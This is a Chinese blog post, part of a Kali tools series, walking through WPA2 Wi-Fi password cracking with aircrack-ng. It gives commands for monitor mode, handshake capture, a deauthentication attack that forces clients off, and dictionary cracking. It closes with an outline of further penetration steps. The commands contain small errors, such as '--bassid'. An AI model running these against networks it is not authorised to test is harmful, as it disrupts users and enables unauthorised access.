• 渗透利器-kali工具 (第八章-1) Wifi密码破解案例


    本文内容:

    • Aircrack-ng简介
    • WIFI破解配置要求
    • WIFI破解的流程
    • 扩展思路如何继续渗透测试

    1,Aircrack-ng简介:

      Aircrack-ng是一个与802.11标准[无线网络标准]的无线网络分析有关的安全软件,主要功能:网络侦测,数据包嗅探,WEB和WPA/WPA2-PS破解。

      Aircrack-ng可以工作在任何支持监听模式的无线网卡上并嗅探802.11a,802.11b,802.11g的数据。

      可以在Linux和Windows上运行。

      开源项目:https://github.com/aircrack-ng/aircrack-ng

      官网:https://www.aircrack-ng.org/

      官方指南:https://www.aircrack-ng.org/doku.php

      教程:https://www.aircrack-ng.org/~~V/doku.php?id=tutorial

      aircrack-ng套件包含有:

        aircrack-ng     破解wep以及wpa[字典攻击]秘钥

        airdecap-ng    通过已知秘钥来解密web或wpa嗅探数据

        airmon-ng      将网卡设置为监听模式

        aireplay-ng     数据包嗅探:将无线网络数据输送到PCAP货IVS文件并显示网络信息

        airtun-ng        创建虚拟管道

        airolib-ng        保存、管理ESSID密码列表

    2,WIFI破解配置要求:

      1.自建WIFI进行测试。

      2.外置网卡设备[RT3070]:可以自己买个,不需要多好十几块钱就可以。

      3.信号稳定

    3,WIFI破解的流程:

      Aircrak-ng破解WAP2-PSK:

      1.查看网卡设备:

        命令:ifconfig / iwconfig

      2.查看是否支持监听模式:

        命令:airmon-ng

      3.开启无线网卡监控模式

        命令:airmon-ng start wlan()    通过查看,wlan0多了一个mon,证明开启成功

      4.查看周围WIFI网络:

        命令:airodump-ng wlan0mon

      5.监听目标网络的握手包:

        命令:airodump-ng -c 11 --bassid 2C:57:31:60:27:E6 -w ~/1/ wlan0mon 

        参数解释:ESSID:为WIFI名字。

          -c 指定频道[信道]号 CH:信道

          -bassid 指定路由器bassid MAC地址

          -w 指定抓取的数据包保存位置  1:文件名

          wlan0mon 开启

        如果没有[WPA handshake:MAC地址],就可以强制让它断开,重新连接,看是否能抓到数据包

      6.强制对方WIFI断开重连[获取握手包]

        命令:aireplay-ng -0 2 -a 2C:57:31:60:27:E6 -c 60:AB:67:F2:F5:A8 wlan0mon

        参数解释:

          -0 表示发起[鉴权] deauthentication攻击 2 为鉴权等级。

          -a 指定无线路由器[开启wifi设备的MAC地址]BSSID

          -c 指定强制断开的设备[链接wifi设备的MAC地址]

          wlan0mon 开启

      7.破解握手包密码: 

        命令:aircrack-ng -a2 -b 52:8F:4C:67:B1:91 -w pass.txt ~/1/*.cap 

        参数解释:

          -a2     代表WPA的握手包

          -b       指定要破解的WIFI[MAC地址] BSSID

          -w      指定字典文件

      8.关闭监听模式:

        命令:airmon-ng stop wlan0mon

        破解密码链接之前要关闭监听模式

    4,扩展思路如何继续渗透测试:

      WIFI密码后的扩展思路:

      想想我们的渗透测试思路:

        1.信息收集

        2.漏洞扫描

        3.漏洞利用 

        4.获取权限

        5.权限维持

        6.整理思路

  • 相关阅读:
    go.js:画布内容导出为图片
    go.js:拖拽创建流程图
    vue+go.js:实现流程图
    前端:go.js去水印
    screenfull错误
    VUE:axios接收后端文件流并下载文件
    CSS:unset 属性
    上传文件小工具
    个人技能总结2--MyBaties框架
    个人技能总结1:Shiro框架
  • 原文地址:https://www.cnblogs.com/xz25/p/12919998.html
Copyright © 2020-2023  润新知